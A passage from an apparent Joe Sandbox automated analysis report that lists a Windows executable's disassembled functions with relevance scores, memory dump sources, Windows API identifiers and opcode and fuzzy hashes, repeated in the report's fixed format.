                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D1E18974E05269CFEB64CF68C984BA9BBB1BB48300F1481EAD859B7381D7349E85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409193 Relevance: 5.3, APIs: 4, Instructions: 274memoryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3394109436-0
                                                                                                                                                                                                                                                              • Opcode ID: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                                              • Instruction ID: cf37d5954fa70898b434e0d26c6706b10c8171271484cbeb9454a15f2979c00d
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1376a99fa1b3c8b711226efaa9cd125e7b0aae65b997332d787d10eea2378ea6
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 58E19B74E05269CFEB64CF68C984BA9BBB1BB48300F1485EAD849A7381D7349E85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409128 Relevance: 5.3, APIs: 4, Instructions: 253COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                                              • Instruction ID: 6ef1666d030b3683f745449ade9432935f6c1ed2423b4b2fea7fa3c30e0d11e8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d3edd96235aad2e448edd85fe0051959f4d3e71b7dd2dead95b0c62df9fb41c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DFD169B4D05269CFEB64CF68C984B99BBB1BB48300F1081EAD84DA7391D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409285 Relevance: 5.2, APIs: 4, Instructions: 248COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                                                                                                                                                              • Instruction ID: 98c6a34e011fea02c5fd1f307661bc496968a447f3de359247ec3e7382062383
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b40b5ad18bbb895345efcde55e0179b9719697a428ab1875b5866f95c7fbef08
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 54D178B4D052698FEB64CF68C980B99BBB1BB48300F1481EAD84DA7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040925A Relevance: 5.2, APIs: 4, Instructions: 247COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                                                                                                                                                              • Instruction ID: bea8f09e258bf7577ce88e7167e750fa30ab14cfac5afba0003b10e989aa1f51
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5d30ce3705b240a9fa9085b13145e6071c26e30a1f734f08b0bddea23f27e83
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FD169B4D05269CFEB64CF68C984B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00409157 Relevance: 5.2, APIs: 4, Instructions: 244COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                                              • Instruction ID: cf999dc1e13fdb9e3b794afb24179b6ab6f8fffdfeb4e36a57addd35a861b0c2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bafe15afffcb6701d4c5351ddd9df98beec2791fc1c3a27858b249eb881a6424
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCC17A74D05269CFEB64CF68C980B99BBB1BB48300F1481EAD849B7381D734AE85CF55
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 004096F9 Relevance: 5.2, APIs: 4, Instructions: 230COMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                                              • Instruction ID: a16c7d6d65317efe9c57d887f34a02eee03e71a6b958f13de8b6000bf5c2667a
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cff38268b4a69b6e7d209897343a178ab99337e8fe27efdfc199a24eb5041e59
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E8C17BB4D05269CFDB64CF68C984B99BBB1BB48300F1081EAD84DA7381D734AE85CF15
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00402E4B Relevance: 4.6, APIs: 3, Instructions: 89registryCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateValue
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1818849710-0
                                                                                                                                                                                                                                                              • Opcode ID: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                                                                                                                                                              • Instruction ID: aa20071d88737d2ca076d9582247293cc4c89cd0404862d20b3ad10084441af9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34cad2bc1fa3e13494afe16162c9cd95c8c0f10228bda9fb96df882e3ad3404d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 813150B09083018FD710EF25C94835ABBF4FB84315F10886EF489A7391D7799A89DF9A
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00403AE9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                                                              • String ID: <@
                                                                                                                                                                                                                                                              • API String ID: 2738559852-4072043054
                                                                                                                                                                                                                                                              • Opcode ID: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                                              • Instruction ID: af84ff8d7bbf5bb76e19132ef8cd2b24e5e30c6edf1d6b1d64d2a00a1082e161
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6535b1fd4e4f43d190a1083287ca5501c92c386e3f1a77b6dec29ccffe7340a
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1EF0ACB1904309AFC700EF69C58454EBBF4AB48354F408839E85993251E734E604CF56
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 0040815B Relevance: 3.1, APIs: 2, Instructions: 60stringCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                                                                                                                                                                • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,00000000,?,?,?,00000000,?,004085CF), ref: 004081BE
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,00000000,?,004085CF), ref: 004081F7
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3248276644-0
                                                                                                                                                                                                                                                              • Opcode ID: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
                                                                                                                                                                                                                                                              • Instruction ID: a4b91be4712b2a5abe4fc9de88cdddcc6cd402f2cf4946f98fb9fcd9c72e04c7
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D6118FB0508314AAD710ABA69A4167A7BD89F05354F46447FECC0AA285CB3C5852866F
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407779 Relevance: 3.0, APIs: 2, Instructions: 29processCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000D.00000002.2700393960.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700380855.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700408230.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700421319.000000000040B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000412000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000041D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000423000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.000000000042D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700435588.0000000000434000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 0000000D.00000002.2700522619.0000000000437000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_kDgMkoNM3lKxwY8D8wOiP15F.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3712363035-0
                                                                                                                                                                                                                                                              • Opcode ID: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
                                                                                                                                                                                                                                                              • Instruction ID: e526153969689a3bb24f951f69113ce00b5f3314808de7d96251afda99080b29
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ecd803767c42d0115cc6630c5d6204aa1c870829ebe70ed70b47319080a31035
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F01BDB4A083058FE700DF65C55874BBBF4BB88348F40892CE984AB380D7B9D5498BDA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Function 00407A78 Relevance: 3.0, APIs: 2, Instructions: 25fileCOMMON
                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32 ref: 00407A85
                                                                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,00403F5B), ref: 00407AC4
                                                                                                                                                                                                                                                              Memory Dump Source
